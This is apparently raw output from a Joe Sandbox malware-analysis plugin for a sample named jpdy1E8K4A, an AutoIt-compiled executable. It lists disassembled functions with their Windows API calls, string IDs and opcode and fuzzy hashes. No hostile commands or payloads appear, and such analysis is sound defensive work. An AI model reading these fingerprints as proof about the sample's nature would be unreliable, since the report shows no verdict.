                                                                                                • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                APIs
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                Similarity
                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                • String ID: @$AutoIt v3 GUI
                                                                                                • API String ID: 867697134-3359773793
                                                                                                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                Similarity
                                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                • API String ID: 1503153545-1459072770
                                                                                                • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                                • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$__wcsnicmp
                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                • API String ID: 790654849-32604322
                                                                                                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                                • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                APIs
                                                                                                  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                                • _fseek.LIBCMT ref: 00452B3B
                                                                                                • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                                • _wcscpy.LIBCMT ref: 00452BB0
                                                                                                • _wcscat.LIBCMT ref: 00452BC5
                                                                                                • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                                • _wcscat.LIBCMT ref: 00452C07
                                                                                                • _wcscat.LIBCMT ref: 00452C1C
                                                                                                • __fread_nolock.LIBCMT ref: 00452C53
                                                                                                • __fread_nolock.LIBCMT ref: 00452C64
                                                                                                • __fread_nolock.LIBCMT ref: 00452C83
                                                                                                • __fread_nolock.LIBCMT ref: 00452C94
                                                                                                • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                                • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                                • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                                • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                • __fread_nolock.LIBCMT ref: 00452D78
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                • String ID:
                                                                                                • API String ID: 2054058615-0
                                                                                                • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                                • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                                APIs
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window
                                                                                                • String ID: 0
                                                                                                • API String ID: 2353593579-4108050209
                                                                                                • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                APIs
                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                • String ID:
                                                                                                • API String ID: 1744303182-0
                                                                                                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                • __mtterm.LIBCMT ref: 00417C34
                                                                                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                • API String ID: 4163708885-3819984048
                                                                                                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                • API String ID: 0-1896584978
                                                                                                • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$IconLoad
                                                                                                • String ID: blank$info$question$stop$warning
                                                                                                • API String ID: 2485277191-404129466
                                                                                                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
• Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
• Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
APIs
• LoadIconW.USER32(?,00000063), ref: 0045464C
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
• SetWindowTextW.USER32(?,?), ref: 00454678
• GetDlgItem.USER32(?,000003EA), ref: 00454690
• SetWindowTextW.USER32(00000000,?), ref: 00454697
• GetDlgItem.USER32(?,000003E9), ref: 004546A8
• SetWindowTextW.USER32(00000000,?), ref: 004546AF
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
• GetWindowRect.USER32(?,?), ref: 004546F5
• SetWindowTextW.USER32(?,?), ref: 00454765
• GetDesktopWindow.USER32 ref: 0045476F
• GetWindowRect.USER32(00000000), ref: 00454776
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
• GetClientRect.USER32(?,?), ref: 004547D2
• PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
• SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
• Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
• Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
• Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
APIs
• _wcslen.LIBCMT ref: 00464B28
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
• _wcslen.LIBCMT ref: 00464C28
• GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
• _wcslen.LIBCMT ref: 00464CBA
• _wcslen.LIBCMT ref: 00464CD0
• _wcslen.LIBCMT ref: 00464CEF
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _wcslen$Directory$CurrentSystem
• String ID: D
• API String ID: 1914653954-2746444292
• Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
• Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
• Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
• Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
APIs
• _wcsncpy.LIBCMT ref: 0045CE39
• __wsplitpath.LIBCMT ref: 0045CE78
• _wcscat.LIBCMT ref: 0045CE8B
• _wcscat.LIBCMT ref: 0045CE9E
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
• _wcscpy.LIBCMT ref: 0045CF61
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
• String ID: *.*
• API String ID: 1153243558-438819550
• Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
• Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
• Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
• Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: __wcsicoll
• String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
• API String ID: 3832890014-4202584635
• Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
• Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
• Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
• Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
APIs
• PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
• GetFocus.USER32 ref: 0046A0DD
• GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessagePost$CtrlFocus
• String ID: 0
• API String ID: 1534620443-4108050209
• Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
• Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
• Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
• Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
APIs
• DestroyWindow.USER32(?), ref: 004558E3
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$CreateDestroy
• String ID: ,$tooltips_class32
• API String ID: 1109047481-3856767331
• Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
• Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
• Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
• Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
APIs
• GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
• GetMenuItemCount.USER32(?), ref: 00468C45
• DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
• DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
• DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
• DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
• GetMenuItemCount.USER32 ref: 00468CFD
• SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
• GetCursorPos.USER32(?), ref: 00468D3F
• SetForegroundWindow.USER32(?), ref: 00468D49
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
• PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 1441871840-4108050209
• Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
• Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
• Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
• Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
